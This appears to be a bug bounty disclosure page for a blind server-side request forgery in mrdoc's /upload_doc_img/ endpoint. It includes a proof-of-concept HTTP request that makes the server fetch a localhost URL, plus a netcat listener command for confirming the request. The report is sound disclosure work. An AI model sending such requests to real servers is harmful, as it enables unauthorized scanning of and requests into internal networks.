Server-Side Request Forgery (SSRF) in zmister2016/mrdoc
Valid
Reported on
Feb 23rd 2022
Description
There is a Blind SSRF in fetching remote images in /upload_doc_img/ endpoint. It's because it does not check hostname before sending HTTP Request to it and only if the content-type be a valid image it will save the response. However, we do not have a full SSRF but there is still a blind one that can be used to scan the internal network and send HTTP requests to that.
Proof of Concept
POST /upload_doc_img/ HTTP/1.1
Host: myserver:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csrftoken=U4FhtxPpcnhZeqt9mW5ZToVONY7mIT8OLrbuOWlSQDHmkZ3BganYOB4YsKu9n2y5; sessionid=2xtj0hfwzr6kb39g26rlkxt1ipksmhnl
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
{"url":"http://localhost:9000/test"}
Impact
This vulnerability is capable of port scanning and even may execute some actions on the victim's side in case there are sensitive services on localhost.
We are processing your report and will contact the
zmister2016/mrdoc
team within 24 hours.
2 years ago
We have contacted a member of the
zmister2016/mrdoc
team and are waiting to hear back
2 years ago
We have sent a
follow up to the
zmister2016/mrdoc
team.
We will try again in 7 days.
2 years ago
We have sent a
second
follow up to the
zmister2016/mrdoc
team.
We will try again in 10 days.
2 years ago
We have sent a
third and final
follow up to the
zmister2016/mrdoc
team.
This report is now considered stale.
2 years ago
Unfortunately not
however, it was just a listener in the local server that shows mrdoc will made the request to 127.0.0.1.
You can do it in your own server by nc -nlvp 9000
The researcher's credibility has increased: +7
to join this conversation